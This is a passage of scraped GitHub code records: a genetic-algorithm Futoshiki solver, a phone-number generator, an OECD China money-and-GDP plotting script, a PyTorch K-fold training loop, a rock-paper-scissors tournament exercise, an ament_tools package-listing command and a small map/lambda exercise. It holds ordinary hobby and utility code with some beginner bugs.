int(config_list[curr][0]) - 1, int(config_list[curr][1]) - 1, int(config_list[curr][2])\n matrix[x,y] = digit # filled\n black_list.add((x,y))\n return matrix\n\n# builds greater_constraints = a dict with all the constarins accccording to config_list\ndef build_greater_than_dict(config_list):\n global given_constraints\n given_constraints = int(config_list[next_index()])\n greater_constraints = {}\n for i in range(given_constraints): # go through constraints\n curr = next_index()\n x1, y1 = int(config_list[curr][0]) - 1, int(config_list[curr][1]) - 1\n x2, y2 = int(config_list[curr][2]) - 1, int(config_list[curr][3]) - 1\n if (x1, y1) not in greater_constraints.keys():\n greater_constraints[(x1, y1)] = [] # init key\n greater_constraints[(x1, y1)].append((x2, y2)) # add value\n return greater_constraints\n\n# builds population dict = from a matrix copy inserts randon population\n# generates a poulation into empty matrix cells and dict\ndef build_population(matrix):\n population = {}\n for index in range(population_size): #100\n matrix_copy = matrix.copy()\n for i in range(N):\n for j in range(N):\n if matrix_copy[i,j] == 0:\n matrix_copy[i,j] = numbers[random.randrange(0, len(numbers))] # insert to matrix\n population[index] = matrix_copy # add to dict\n return population\n\n# receives a matrix and fills row values as permutation and returns population dict\ndef build_population_rows(matrix):\n population = {}\n list_row = numbers.copy() # val not in constrains\n while len(population) < population_size: # make matrixs\n matrix_copy = matrix.copy()\n # go through each row\n for row in range(N):\n list_row = numbers.copy() # val not in constrains\n no_cons_list = [] # index of cells with NO sonstrains (need to fill)\n \n # go through each each cell in row\n for column in range(N):\n if matrix_copy[row,column] == 0: # empty no constrain\n no_cons_list.append(column)\n else: # not 0 has constarain - remove from list_row\n list_row.remove(matrix_copy[row,column]) \n # look at full row\n l = list(permutations(list_row)) # using only vaues that arent in constrains in current row\n chosen_row = random.choice(l) # get random perm\n # fill row with values that arent in constrains in indexes that arend in constarins\n i = 0\n for column in no_cons_list: # index\n matrix_copy[row,column] = chosen_row[i] # insert to matrix\n i =+ 1\n population[str(matrix_copy)] = matrix_copy # add to dict\n return population\n\n# ------- fitness functions ---------------------------------------------------------------------#\n# calc matrix fitness score according to num of errors in row and column \n# the higher the score the better\ndef fitness(matrix):\n numbers_set = set(numbers)\n errors = 0\n for i in range(N):\n errors += N - len(set(matrix[i])) # row\n errors += N - len(set(matrix[:,i])) # column \n for cell in greater_constraints.keys():\n for related in greater_constraints[cell]:\n if matrix[cell] <= matrix[related]:\n errors += constraint_weight \n return max_fitness - errors # scrore \n\n# receives population dict of all positions and calcalates corrent population's score\ndef build_fitness_scores(population):\n# ------------------------------------------------------------------------------------------------#\n fitness_scores = {}\n for key in population.keys():\n fitness_scores[key] = fitness(population[key])\n return fitness_scores\n\n# chooses best two population matrix with highest scores - matrix with higher scores will have more chance to be chosen\ndef choose_parents(population, fitness_scores):\n raffle_box = [] # list\n for index in population.keys():\n raffle_box.extend([index for i in range(fitness_scores[index])]) # matrix with higher scores will have more chance to be chosen\n index1, index2 = random.sample(raffle_box, 2) # choose 2\n return population[index1], population[index2]\n\n# ------- cross_over ----------------------------------------------------------------------------#\n# create new matrix according to 2 parent matrix\ndef cross_over(matrix1, matrix2):\n max_crossed = matrix1.copy()\n max_fit = fitness(max_crossed)\n # checks horizontal and vertical cross and according to highest fit chooses best crossover\n N_half = int(N/2)\n chosen = []\n for index in range(N):\n # 1) horizontal\n horizontal_cross = matrix1.copy()\n horizontal_cross[index:] = matrix2[index:] # row\n horizontal_fit = fitness(horizontal_cross)\n if horizontal_fit > max_fit:\n chosen = \"horizontal\"\n max_crossed = horizontal_cross\n max_fit = horizontal_fit\n \n # half left horizontal\n horizontal_half_left = matrix1.copy()\n horizontal_half_left[index:N_half] = matrix2[index:N_half] # left row\n horizontal_half_left_fit = fitness(horizontal_half_left)\n if horizontal_half_left_fit > max_fit:\n chosen = \"half left horizontal\"\n max_crossed = horizontal_half_left\n max_fit = horizontal_half_left_fit\n \n # half right horizontal\n horizontal_half_right = matrix1.copy()\n horizontal_half_right[N_half:index] = matrix2[N_half:index] # right row\n horizontal_half_right_fit = fitness(horizontal_half_right)\n if horizontal_half_right_fit > max_fit:\n chosen = \"half right horizontal\"\n max_crossed = horizontal_half_right\n max_fit = horizontal_half_right_fit\n \n # half vertical\n vertical_cross = matrix1.copy()\n vertical_cross[:, index:] = matrix2[:, index:] # column\n vertical_fit = fitness(vertical_cross)\n if vertical_fit > max_fit:\n chosen = \"half vertical\"\n max_crossed = vertical_cross\n max_fit = vertical_fit\n \n # half top vertical\n vertical_cross_top = matrix1.copy()\n vertical_cross_top[:, index:N_half] = matrix2[:, index:N_half] # top column\n vertical_top_fit = fitness(vertical_cross_top)\n if vertical_top_fit > max_fit:\n chosen = \"half top vertical\"\n max_crossed = vertical_cross_top\n max_fit = vertical_top_fit\n \n # half lower vertical\n vertical_cross_lower = matrix1.copy()\n vertical_cross_lower[:, N_half:index] = matrix2[:, N_half:index] # lower column\n vertical_lower_fit = fitness(vertical_cross_lower)\n if vertical_lower_fit > max_fit:\n chosen = \"half lower vertical\"\n max_crossed = vertical_cross_lower\n max_fit = vertical_lower_fit\n \n \n #print(\"chosen: \", chosen)\n return max_crossed # where the slices' union is the smallest\n\n# bool checks if random is smaller then the probability given - used in create_new_population()\ndef raffle(probability):\n return random.random() < probability\n\n# ------- mutation ------------------------------------------------------------------------------#\n# create mutation in one cell of the matrix given - inputs a random value\ndef mutation(matrix):\n success = False\n while not success:\n i = random.randrange(0, N)\n j = random.randrange(0, N)\n if (i,j) not in black_list:\n success = True\n new_number = random.choice(numbers)\n matrix[i,j] = new_number\n return matrix\n\n# creates generations that keep improving \ndef create_new_population(population, fitness_scores):\n # cross over\n matrix1, matrix2 = choose_parents(population, fitness_scores) # parents\n matrix = cross_over(matrix1, matrix2) # child\n \n # mutate\n if raffle(mutation_percent):\n matrix = mutation(matrix)\n return matrix\n\n# generates a new matrix randomly\ndef create_random_population():\n random_matrix = initial_matrix.copy()\n for i in range(N):\n for j in range(N):\n if random_matrix[i,j] == 0:\n random_matrix[i,j] = numbers[random.randrange(0, len(numbers))] # insert to matrix\n return random_matrix\n\n# returns a list chosen_population that hold 200*0.3 best scored matrixs\ndef choose_best(population, fitness_scores):\n # sort fitness_scores\n sorted_fitness_scores_values = sorted(fitness_scores.items(), key=lambda x: x[1], reverse=True)\n # cut 200*0.3 highest = best of population\n highest = int(population_size * old_population_percent)\n highest_mats = sorted_fitness_scores_values[:highest]\n chosen_population = []\n for key,value in highest_mats:\n chosen_population.append(population[key]) # add\n return chosen_population\n\n# ------- create_new_generation ---------------------------------------------------------------------#\n# genareate a new generation - \ndef create_new_generation(chosen_population, lamarck = False):\n new_amount = int(population_size * new_population_percent)\n amount_random = int(population_size * random_population_percent)\n new_generation = {}\n new_scores = {}\n # takes best of current populations and keeps them alive for next gen\n for matrix in chosen_population:\n if lamarck:\n matrix = optimization(matrix)\n key = str(matrix)\n new_generation[key] = matrix\n new_scores[key] = fitness(matrix)\n # creates new matrix according to crossovers between parent matrixs\n counter = 0\n while counter < new_amount:\n matrix = create_new_population(population, fitness_scores)\n if lamarck:\n matrix = optimization(matrix)\n key = str(matrix)\n if key not in new_generation:\n counter += 1\n new_generation[key] = matrix\n new_scores[key] = fitness(matrix)\n # rand new population\n counter = 0\n while counter < amount_random:\n matrix = create_random_population()\n if lamarck:\n matrix = optimization(matrix)\n key = str(matrix)\n if key not in new_generation:\n counter += 1\n new_generation[key] = matrix\n new_scores[key] = fitness(matrix)\n return new_generation, new_scores\n\n# ------- optimization ------------------------------------------------------------------------------#\n# oprimizes a matrix by finding the cells where the constrains aren't settled\n# and randomly choose one of the problimatic cells and to fix to the right value\ndef optimization(original_matrix):\n matrix = original_matrix.copy()\n for i in range(N):\n row = matrix[i] # looking for duplicates in row i\n row_set = set(row) # unique items in the row\n if len(row_set) < N: # which means we have missing digits and duplicates\n missing = list(set(numbers).difference(row_set)) # list of missing numbers in the row\n repeating = list(set([i for i in list(row) if list(row).count(i)>1])) # list of duplicated numbers in the row\n chosen_missing = missing[random.randrange(0, len(missing))] # randomly choose one of each\n chosen_repeating = repeating[random.randrange(0, len(repeating))]\n \n repeating_index = [] # getting all the places where the value is equal to the chosen duplicated number\n for j in range(N):\n if row[j] == chosen_repeating: # appending each index that satisfies this condition\n repeating_index.append(j)\n\n chosen_j = repeating_index[random.randrange(0, len(repeating_index))] # choosing randomly one index \n if (i, chosen_j) not in black_list: # making sure we're not changing a given digits (part of the constraints)\n matrix[i, chosen_j] = chosen_missing\n \n col = matrix[:, i] # looking for duplicates in column i, logically identical as with row\n col_set = set(col)\n if len(col_set) < N:\n missing = list(set(numbers).difference(col_set))\n repeating = list(set([i for i in list(col) if list(col).count(i)>1]))\n chosen_missing = missing[random.randrange(0, len(missing))]\n chosen_repeating = repeating[random.randrange(0, len(repeating))]\n \n repeating_index = []\n for j in range(N):\n if col[j] == chosen_repeating:\n repeating_index.append(j)\n\n chosen_j = repeating_index[random.randrange(0, len(repeating_index))]\n if (chosen_j, i) not in black_list:\n matrix[chosen_j, i] = chosen_missing\n \n if fitness(original_matrix) < fitness(matrix): # we return this matrix only if its really optimized\n return matrix\n \n return original_matrix # otherwise stay with the original matrix\n\n# used each time we create a changed and better solution matrix - initialized vars needed\ndef initialize(config_file = \"config.txt\"):\n global index, config_list, initial_matrix, greater_constraints, max_fitness, numbers, max_score_list_reg, \\\n av_score_list_reg, max_score_list_darwin, av_score_list_darwin, max_score_list_lamark, av_score_list_lamark, \\\n accuracy_reg, accuracy_darwin, accuracy_lamark, maximum_generation\n max_score_list_reg, av_score_list_reg = [], []\n max_score_list_darwin, av_score_list_darwin = [], []\n max_score_list_lamark, av_score_list_lamark = [], []\n index = 0\n config_list = read_config_list(config_file) # board config txt file\n initial_matrix = build_matrix(config_list) # matrix of all configuration - empty\n greater_constraints = build_greater_than_dict(config_list) # dict with all constarins\n max_fitness = N * N * 2 + len(greater_constraints) * constraint_weight\n numbers = list(np.arange(1,N + 1))\n accuracy_reg, accuracy_darwin, accuracy_lamark = 0, 0, 0\n maximum_generation = N ** 3\n\n# used to restart varubales between the execution of diffrent genetic algo\n# keep algo independent one from another\ndef restart():\n global population, fitness_scores, generation\n generation = 1\n population = build_population_rows(initial_matrix) # init poulation matrix and dict - filled #TODO\n max_fitness = N * N * 2 + len(greater_constraints) * constraint_weight\n fitness_scores = build_fitness_scores(population) # dict\n\n# get average of a list\ndef average_list_val(lst):\n return sum(lst) / len(lst)\n\n# ------- our genetic algorithms ----------------------------------------------------------------#\n# the naive regular genetic algo - no optimization made\ndef regular_ga():\n restart()\n global population, fitness_scores, generation, accuracy_reg\n while generation != maximum_generation:\n best_old_population = choose_best(population, fitness_scores)\n population, fitness_scores = create_new_generation(best_old_population)\n # print(generation, \":\", max(fitness_scores.values()))\n \n max_score_list_reg.append(max(fitness_scores.values())) # max\n av_score_list_reg.append(average_list_val(fitness_scores.values())) # mean\n generation = generation + 1\n \n for key in fitness_scores.keys():\n fit = fitness_scores[key]\n if fit == max_fitness:\n accuracy_reg = 1\n success_message(population[key])\n return\n \n accuracy_reg = round(max(fitness_scores.values()) / max_fitness, 2)\n approx_message()\n \n# optimize all matrixs, fitness score calc after opt.\n# next gen made BEFORE optimization \ndef darwin_ga():\n restart()\n global population, fitness_scores, generation, accuracy_darwin\n while generation != maximum_generation:\n best_old_population = choose_best(population, fitness_scores)\n population, fitness_scores = create_new_generation(best_old_population)\n # print(generation, \":\", max(fitness_scores.values()))\n \n generation = generation + 1\n \n for key, matrix in population.items():\n optimized = optimization(matrix)\n fit = fitness(optimized)\n if fit == max_fitness:\n accuracy_darwin = 1\n max_score_list_darwin.append(fit)\n av_score_list_darwin.append(average_list_val(fitness_scores.values()))\n success_message(optimized)\n return\n \n max_score_list_darwin.append(max(fitness_scores.values())) # max\n av_score_list_darwin.append(average_list_val(fitness_scores.values())) # mean\n \n accuracy_darwin = round(max(fitness_scores.values()) / max_fitness, 2)\n approx_message()\n\n# optimize all matrixs, fitness score calc after opt. \n# next gen made AFTER optimization\ndef lamarck_ga():\n restart()\n global population, fitness_scores, generation, accuracy_lamark\n while generation != maximum_generation:\n best_old_population = choose_best(population, fitness_scores)\n population, fitness_scores = create_new_generation(best_old_population, True)\n # print(generation, \":\", max(fitness_scores.values()))\n \n max_score_list_lamark.append(max(fitness_scores.values())) # max\n av_score_list_lamark.append(average_list_val(fitness_scores.values())) # mean\n \n generation = generation + 1\n \n for key in fitness_scores.keys():\n fit = fitness_scores[key]\n if fit == max_fitness:\n accuracy_lamark = 1\n success_message(population[key])\n return\n \n accuracy_lamark = round(max(fitness_scores.values()) / max_fitness, 2)\n approx_message()\n# ----------------------------------------------------------------------------------------------#\n\ndef success_message(matrix):\n print(\"An optimal solution found after\", generation, \"generations\")\n print_solution(matrix)\n\ndef approx_message():\n matrix_id, fitness = max(fitness_scores.items(), key=lambda x: x[1])\n matrix = population[matrix_id]\n print(\"An approximate solution found after\", generation, \"generations, with accuracy of\", str(round(fitness/max_fitness, 2)))\n print_solution(matrix)\n \n# printing a represantation matrix with signs according to the given constraints\ndef print_solution(matrix):\n rep_mat = np.full((2*N-1, 2*N-1), \" \")\n for x1 ,y1 in greater_constraints.keys():\n for x2, y2 in greater_constraints[(x1 ,y1)]:\n if x1 == x2:\n if y1 < y2:\n rep_mat[x1*2, y1*2 + 1] = \">\"\n else:\n rep_mat[x1*2, y1*2 - 1] = \"<\"\n elif y1 == y2:\n if x1 < x2:\n rep_mat[x1*2+1, y1*2] = \"V\"\n else:\n rep_mat[x1*2-1, y1*2] = \"A\"\n \n for i in range(N):\n for j in range(N):\n rep_mat[i*2,j*2] = matrix[i,j]\n \n print(tabulate(rep_mat, tablefmt='fancy_grid'))\n\n# -------- plot --------------------------------------------------------------------------------#\n# creates a comparision plot for a config txt file with all three genetic algorithms\ndef plot():\n board_size = str(N) + \"*\" + str(N)\n plt.plot(max_score_list_reg, label = \"Regular MAX score\", color = 'b')\n plt.plot(av_score_list_reg, label = \"Regular AVERAGE score\", color = 'c', linestyle ='--')\n plt.plot(max_score_list_darwin, label = \"Darwin MAX score\", color ='g')\n plt.plot(av_score_list_darwin, label = \"Darwin AVERAGE score\", color ='y', linestyle ='--')\n plt.plot(max_score_list_lamark, label = \"Lamark MAX score\", color ='r')\n plt.plot(av_score_list_lamark, label = \"Lamark AVERAGE score\", color ='m', linestyle ='--')\n plt.xlabel('generation')\n plt.ylabel('Fitness score')\n level = [\"EASY\", \"TRICKY\"]\n plt.title(\"Comparision of algorithms - Board: \" + str(board_size) + \" Level: \" \n + str(level[1]) + '\\n' + \"Accuracy: Regular: \" + str(accuracy_reg) +\n \" Darwin: \" + str(accuracy_darwin) + \" Lamark: \" + str(accuracy_lamark))\n plt.legend() \n plt.show()\n","repo_name":"shiraznave/Genetic-Algorithm-Futoshiki-Puzzle","sub_path":"code/ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":22123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"5067586663","text":"from random import sample\r\n\r\nclass randomPhoneNumber():\r\n def __init__(self,rows, limit, country):\r\n self.rows= rows\r\n self.Limit= limit\r\n self.country= country\r\n self.destFile= rf'work\\1.PhoneNumber_SmallTest\\RandomPhoneNumber_{country}_{rows}rows.txt'\r\n\r\n def number(self):\r\n _list= [0,1,2,3,4,5,6,7,8,9]\r\n listRandom= sample(_list,self.Limit)\r\n return listRandom\r\n \r\n def write(self):\r\n with open(self.destFile, 'w') as f:\r\n for j in range(self.rows):\r\n resolve= ''\r\n resolve+= str(self.country)+ ' '+f'9'\r\n\r\n for i in self.number():\r\n resolve+= f'{i}'\r\n print(resolve)\r\n f.write(''.join(resolve+ \"\\n\"))\r\n f.close()\r\n\r\nrows= 10\r\nnumberLimit= 8\r\ncountryCode= '+886'\r\nrandomN= randomPhoneNumber(rows, numberLimit, countryCode)\r\nrandomN.write()","repo_name":"data0504/PythonSmallTest","sub_path":"PhoneNunber.py","file_name":"PhoneNunber.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34177246972","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 18 08:09:38 2021\n\n@author: wanderer\n\"\"\"\n\n# https://github.com/LenkaV/CIF/blob/develop/examples/CI_minimalPipeline.ipynb\n\n# import os\nfrom cif import cif\nimport pandas as pd\nimport datetime\n\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\n\n# print(os.environ['X13PATH'])\n# only for seasonal adjustment\n\nmpl.rcParams['font.family'] = 'Helvetica Neue'\nsave_loc = '~/Desktop/hu'\n\nredownloaddata = True\n\nif redownloaddata:\n country = 'CHN' # Select target country\n \n bw = False # True for black and white visualisations\n \n saveData = False # Save the original data sets if True\n \n strDate = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M\")\n \n #outputDir = os.path.join('plots_' + country + '_' + strDate)\n #os.makedirs(outputDir, exist_ok = True)\n \n data_all, subjects_all, measures_all = cif.createDataFrameFromOECD(countries = [country], dsname = 'MEI', frequency = 'Q',\n subject = ['NAEXCP01','MABMM301'],\n measure = ['STSA','IXOBSA'])\n \n #data_rs, subjects_rs, measures_rs = cif.createDataFrameFromOECD(countries = [country], dsname = 'QNA', subject = ['B1_GE'], frequency = 'Q')\n \n print('Downloaded MEI data set size: %d x %d' % (data_all.shape[0], data_all.shape[1]))\n # print('Downloaded reference data set size: %d x %d' % (data_rs.shape[0], data_rs.shape[1]))\n \n '''\n if saveData:\n # Save the data\n data_all.to_csv(os.path.join(outputDir, 'data_all.csv'))\n subjects_all.to_csv(os.path.join(outputDir, 'subjects_all.csv'))\n measures_all.to_csv(os.path.join(outputDir, 'measures_all.csv'))\n data_rs.to_csv(os.path.join(outputDir, 'data_rs.csv'))\n subjects_rs.to_csv(os.path.join(outputDir, 'subjects_rs.csv'))\n measures_rs.to_csv(os.path.join(outputDir, 'measures_rs.csv'))\n '''\n # print(data_all)\n \n data_all['time'] = data_all.index\n data_all['time'] = pd.PeriodIndex(data_all['time'], freq = 'Q')\n data_all = data_all.set_index('time')\n\n \n deflator = pd.read_csv(save_loc + r'/GDP Deflator YoY Quarterly China.csv')\n deflator = deflator.iloc[25:]\n deflator.rename(columns = {'Unnamed: 0':'time'}, inplace = True)\n deflator.rename(columns = {'GDP Deflator: YoY: Quarterly: China':'GDP deflator'}, inplace = True)\n deflator['time'] = deflator['time'].apply(lambda x: pd.to_datetime(str(x)))\n deflator['time'] = pd.PeriodIndex(deflator['time'], freq = 'Q')\n deflator = deflator.set_index('time')\n \n # Convert YOY deflator to constant price (2015Q1) deflator\n deflator['GDP deflator'] = deflator['GDP deflator'].astype(float)\n deflator = deflator['GDP deflator'].apply(lambda x:1 + x/100)\n deflator = deflator.cumprod()\n deflator = deflator/(deflator['2015Q1'])\n \n deflator.to_pickle(save_loc + r'/CHNdefl.pkl') \n data_all.to_pickle(save_loc + r'/CHNbm.pkl')\n\n \ndeflator = pd.read_pickle(save_loc + r'/CHNdefl.pkl')\ndata_all = pd.read_pickle(save_loc + r'/CHNbm.pkl')\ndata = pd.DataFrame({'Broad money' : []})\ndata['Broad money'] = data_all['CHN']['MABMM301']['IXOBSA']\ndata['Nominal GDP'] = data_all['CHN']['NAEXCP01']['STSA']\ndata = pd.concat([data, deflator], axis=1)\ndata['Real GDP'] = data['Nominal GDP'] * data['GDP deflator']\npltdata = data.drop('GDP deflator', axis=1)\n\n# Same period last year\npltdata = pltdata.pct_change(periods = 4)\npltdata = 100*pltdata\n\n\n# Graphing!\nfig, axes = plt.subplots(1,1, figsize=(12,6), sharex=True)\npltdata.plot(subplots=False, ax=axes, marker='o', ms=3)\n\n# add titles\naxes.set_title('Quarterly ' + 'M3, nominal and real GDP percentage change',\n fontsize=14,\n fontweight='demi')\n\n# add axis labels\naxes.set_ylabel('% change\\n(Annualized)', fontsize=12, fontweight='demi')\naxes.set_xlabel('Date', fontsize=12, fontweight='demi')\n\naxes.yaxis.set_major_formatter(mticker.PercentFormatter())\n\n# bold up tick axes\naxes.tick_params(axis='both', which='major', labelsize=11)\n\n\nplt.savefig('CHNbm.png', dpi=300)\n","repo_name":"Icosahedral-Dice/FE","sub_path":"CN_M2-GDP/CHNbm.py","file_name":"CHNbm.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23446820829","text":"def reset_weights(m): #model을 받는다\n ###어떤 모델을 만들고 사용시 parameter 초기화용 함수\n '''\n Try resetting model weights to avoid\n weight leakage.\n '''\n for layer in m.children(): #model의 모든 layer에 있는 parameter들을 for문으로 돈다\n if hasattr(layer, 'reset_parameters'): #이때 'reset_parameters'라는 attribute가 있다면 \n # print(f'Reset trainable parameters of layer = {layer}')\n layer.reset_parameters() #layer에 있는 모든 파라메터 초기화\n\nepoch = 10\nsm = nn.Softmax(dim=1)\ncriterion = nn.CrossEntropyLoss()\n\nfold_train_losses = []\nfold_val_losses = []\n\nrunning_loss = torch.zeros(epoch)\nval_loss = torch.zeros(epoch)\naccuracy = torch.zeros(epoch)\n\ntrain_losses = []\nval_losses = []\n\n\n#kf = KFold(n_splits=5, shuffle=True)\nfor fold, (train_ind, valid_ind) in enumerate(kf.split(train_data)): #enumerate를 통해 fold에 count 반환 \n #kf: instance of KFold() #kf.split(train_data) -> train set과 val set을 튜플 형태로 돌려준다. #4/5는 train set, 즉, 랜덤하게 뽑은 인덱스를 리스트로 돌려준다\n print('Starting fold = ', fold)\n #sampler 정의\n train_sampler_kfold = SubsetRandomSampler(train_ind) #train_ind를 data loader의 sampler 인자가 받을 수 있는 객체로 변환해준다\n valid_sampler_kfold = SubsetRandomSampler(valid_ind)\n \n #data loader 정의\n train_loader_kfold = torch.utils.data.DataLoader(train_data, batch_size=batch_size, sampler=train_sampler_kfold) \n # train_data중에서 sampler(train_ind) 인덱스에 해당하는 data를 random으로 batch_size만큼 가져온다 \n valid_loader_kfold = torch.utils.data.DataLoader(train_data, batch_size=batch_size, sampler=valid_sampler_kfold)\n \n model.apply(reset_weights) #파라메터 초기화 -> 새로운 fold에서 즉, 새로운 training, val set에 대해서도 성능을 확인하려면 network을 다시 초기화 하고 그 loss를 저장해야한다.\n optimizer = optim.Adam(model.parameters(), lr=0.003)\n \n for e in np.arange(epoch): #(첫번째 fold-첫번째 epoch loss, 첫번째 fold-두번째 epoch loss를 저장 ...)->모든 fold의 모든 epoch별로 training loss가 전부 저장된다.\n print('Starting epoch = ', e)\n \n # Training\n model.train()\n for Xtrain, ytrain in train_loader_kfold:\n # Xtrain = Xtrain.reshape(Xtrain.shape[0],-1)\n optimizer.zero_grad()\n logits = model(Xtrain)\n loss = criterion(logits, ytrain)\n loss.backward()\n optimizer.step()\n \n running_loss[e] += loss.item()\n \n # Validation\n model.eval()\n with torch.no_grad():\n for Xtrain, ytrain in valid_loader_kfold:\n # Xtrain = Xtrian.reshape(Xtrian.shape[0],-1)\n logits = model(Xtrain) \n val_loss[e] += criterion(logits, ytrain)\n \n ps = sm(logits) \n top_p, top_class = ps.topk(1,dim=1)\n equals = top_class == ytrain.reshape(top_class.shape)\n accuracy[e] += torch.mean(equals.type(torch.float)) #이미 epoch만큼 0으로 채워진 \"torch array\"기 때문에(즉, 파이썬 리스트와 달리 크기가 정해져있음) +=로 추가\n \n \n train_losses.append(running_loss/len(train_loader_kfold)) #training loss 모아둔 것/batch size (epoch한번 진행할 때마다 출력) #list니까 append 사용해서 추가\n val_losses.append(val_loss/len(valid_loader_kfold)) #valid_loss 모아둔 것/batch size\n \n print(\"Epoch: {}/{}.. \".format(e+1, epoch), \n \"Training Loss: {:.3f}.. \".format(running_loss[e]/len(train_loader_kfold)), #현재 epoch에서의 loss(오차들의 평균)출력\n \"Validation Loss: {:.3f}.. \".format(val_loss[e]/len(valid_loader_kfold)),\n \"Validation Accuracy: {:.3f}\".format(accuracy[e]/len(valid_loader_kfold)))\n \n# fold_train_losses.append()\n# fold_val_losses.append()\n","repo_name":"kissess/DL_final","sub_path":"k-fold .py","file_name":"k-fold .py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31839093428","text":"import os\n\nfrom ament_tools.helper import argparse_existing_dir\nfrom ament_tools.package_types import parse_package\nfrom ament_tools.packages import find_package_paths\nfrom ament_tools.packages import find_unique_packages\nfrom ament_tools.topological_order import topological_order_packages\n\n\ndef prepare_arguments(parser):\n parser.add_argument(\n 'basepath',\n nargs='?',\n type=argparse_existing_dir,\n default=os.curdir,\n help='Base paths to recursively crawl for packages',\n )\n parser.add_argument(\n '--topological-order', '-t',\n action='store_true',\n default=False,\n help='Order output based on topological order',\n )\n parser.add_argument(\n '--names-only',\n action='store_true',\n default=False,\n help='Print the names of the packages but not the path',\n )\n parser.add_argument(\n '--paths-only',\n action='store_true',\n default=False,\n help='Print the paths of the packages but not the name',\n )\n parser.add_argument(\n '--depends-on',\n help='Only show packages which depend on the given package',\n )\n return parser\n\n\ndef get_unique_depend_names(package):\n names = {\n d.name for d in\n package.build_depends +\n package.buildtool_depends +\n package.build_export_depends +\n package.buildtool_export_depends +\n package.exec_depends +\n package.test_depends +\n package.doc_depends\n if d.evaluated_condition\n }\n for g in package.group_depends:\n if g.evaluated_condition:\n names |= set(g.members)\n return names\n\n\ndef main(options):\n lines = []\n if not options.topological_order:\n package_paths = find_package_paths(options.basepath)\n # parse package manifests\n packages = {}\n for package_path in package_paths:\n package_abs_path = os.path.join(options.basepath, package_path)\n package = parse_package(package_abs_path)\n packages[package_path] = package\n # evaluate conditions\n for package in packages.values():\n package.evaluate_conditions(os.environ)\n # expand group dependencies\n for package in packages.values():\n for group in package.group_depends:\n if group.evaluated_condition:\n group.extract_group_members(packages.values())\n for package_path, package in packages.items():\n if options.depends_on is not None:\n if options.depends_on not in get_unique_depend_names(package):\n continue\n if options.names_only:\n lines.append(package.name)\n elif options.paths_only:\n lines.append(package_path)\n else:\n lines.append(package.name + ' ' + package_path)\n lines.sort()\n else:\n packages = find_unique_packages(options.basepath)\n packages = topological_order_packages(packages)\n for package_path, package, _ in packages:\n if options.depends_on is not None:\n if options.depends_on not in get_unique_depend_names(package):\n continue\n if options.names_only:\n lines.append(package.name)\n elif options.paths_only:\n lines.append(package_path)\n else:\n lines.append(package.name + ' ' + package_path)\n for line in lines:\n print(line)\n\n\n# meta information of the entry point\nentry_point_data = {\n 'verb': 'list_packages',\n 'description': 'List names and relative paths of packages',\n # Called for execution, given parsed arguments object\n 'main': main,\n # Called first to setup argparse, given argparse parser\n 'prepare_arguments': prepare_arguments,\n}\n","repo_name":"mintforpeople/robobo-ros2-ios-port","sub_path":"ros2_mod_ws/install/lib/python3.7/site-packages/ament_tools/verbs/list_packages.py","file_name":"list_packages.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43179514800","text":"import sys\nsys.stdin = open(\"input_4.txt\", \"r\")\n\n\ndef game(p1_s, p2_s):\n if p1_s[1] == p2_s[1]:\n return p1_s\n elif p1_s[1] - p2_s[1] == -2 or p1_s[1] - p2_s[1] == 1:\n return p1_s\n elif p1_s[1] - p2_s[1] == -1 or p1_s[1] - p2_s[1] == 2:\n return p2_s\n\n\ndef play(li_test):\n if len(li_test) == 2:\n return game(li_test[0], li_test[1])\n if len(li_test) == 1:\n return li_test[0]\n# 4 3 0 1 2 3 8 4 4\n li_1 = li_test[:(len(li_test)+1)//2]\n li_2 = li_test[(len(li_test)+1)//2:]\n p1 = play(li_1)\n p2 = play(li_2)\n return game(p1, p2)\n\n # if N % 2 == 0: # 짝수\n # for _ in range(N//2):\n # p1 = stack.pop(0)\n # p2 = stack.pop(0)\n # stack.append(game(p1, p2))\n # return\n # elif N % 2 == 1: # 홀수\n # for _ in range(N//2-1):\n # p1 = stack.pop(0)\n # p2 = stack.pop(0)\n # stack.append(game(p1, p2))\n # return\n\n\nT = int(input())\n\nfor TC in range(1, T+1):\n N = int(input())\n stack = []\n\n li = list(map(int, input().split()))\n li_li = [[0] for _ in range(N)]\n for i in range(N):\n li_li[i] = [i+1, li[i]]\n\n len_s = 0\n\n result = play(li_li)\n # while True:\n # len_s = len(stack)\n # play(len_s)\n # if len(stack) == 1:\n # break\n # result = stack.pop()\n\n print('#%d %d' % (TC, result[0]))\n","repo_name":"sondongmin0419/study","sub_path":"python/s_4880_2.py","file_name":"s_4880_2.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6526583","text":"from aula80.dados import pessoas\n\n\n# nova_lista = map(lambda x: x * 2, lista)\n\n# nova_lista = [x *2 for x in lista] # multiplica cada item da lista por 2\n# print(lista)\n# print(list(nova_lista))\n# preços= map(lambda p: p['preço'], produtos) # acessando o conteudo de produto com lambda\n# for preço in preços:\n# print(preço)\n\n\n\n\n\n# def aumenta_preco(p): #aumenta 5% a mais no valor\n# p['preço'] = round(p['preço'] * 1.05,2) # round reduziu a casa após a virgula em 2\n# return p\n#\n# novos_produtos = map(aumenta_preco, produtos)\n#\n# for produto in novos_produtos:\n# print(produto)\n\ndef aumenta_idade(p):\n p['nova_idade'] = round(p['idade'] * 1.20)\n return p\n\nnomes = map(aumenta_idade, pessoas)\n\nfor pessoa in nomes:\n 